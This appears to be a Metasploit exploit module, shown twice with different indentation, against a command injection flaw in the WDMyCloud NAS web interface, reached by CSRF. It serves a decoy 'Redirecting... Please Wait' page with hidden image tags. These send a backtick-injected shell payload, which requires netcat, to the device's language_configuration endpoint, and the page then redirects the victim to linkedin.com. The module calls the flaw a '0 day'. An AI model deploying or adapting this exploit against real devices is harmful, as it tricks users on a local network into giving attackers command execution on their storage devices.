carnal0wnage/wdmycloud_cmd_injection_csrf.rb

## wdmycloud_cmd_injection_csrf.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WDMyCloud NAS Command Injection CSRF',
      'Description'    => %q{
          This module exploits a command injection vulnerability in the web interface
          of the WDMyCloud NAS device, via CSRF.  It will submit the CSRF request
          to RHOST, as well as wdmycloud and wdmycloud.local.
      },
      'Author'         => [ 'phikshun' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'NA', 'NA' ],
        ],
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '0 day, yo'))

    register_options([Opt::RHOST("192.168.1.100")], self.class)
  end

  def generate_html
    params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")

    html = <<-EOS
<html>
<body>
<h1>Redirecting... Please Wait</h1>
<div style='display:none'>
<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />
<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />
<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' />
</div>
<script>
  window.setTimeout(function(){
    window.location = 'http://www.linkedin.com';
  }, 5000);
</script>
</body>
</html>
EOS
  end

  def on_request_uri(cli, request)
    print_status("Sending CSRF")
    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    handler(cli)
  end
end
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'WDMyCloud NAS Command Injection CSRF',
	'Description' => %q{
	This module exploits a command injection vulnerability in the web interface
	of the WDMyCloud NAS device, via CSRF. It will submit the CSRF request
	to RHOST, as well as wdmycloud and wdmycloud.local.
	},
	'Author' => [ 'phikshun' ],
	'License' => MSF_LICENSE,
	'References' =>
	[
	[ 'NA', 'NA' ],
	],
	'Platform' => [ 'unix' ],
	'Arch' => ARCH_CMD,
	'Privileged' => true,
	'Payload' =>
	{
	'Space' => 1024,
	'DisableNops' => true,
	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'netcat',
	}
	},
	'Targets' =>
	[
	[ 'Automatic', { } ]
	],
	'Privileged' => false,
	'DefaultTarget' => 0,
	'DisclosureDate' => '0 day, yo'))

	register_options([Opt::RHOST("192.168.1.100")], self.class)
	end

	def generate_html
	params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")

	html = <<-EOS
	<html>
	<body>
	<h1>Redirecting... Please Wait</h1>
	<div style='display:none'>
	<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />
	<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />
	<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' />
	</div>
	<script>
	window.setTimeout(function(){
	window.location = 'http://www.linkedin.com';
	}, 5000);
	</script>
	</body>
	</html>
	EOS
	end

	def on_request_uri(cli, request)
	print_status("Sending CSRF")
	send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
	handler(cli)
	end
	end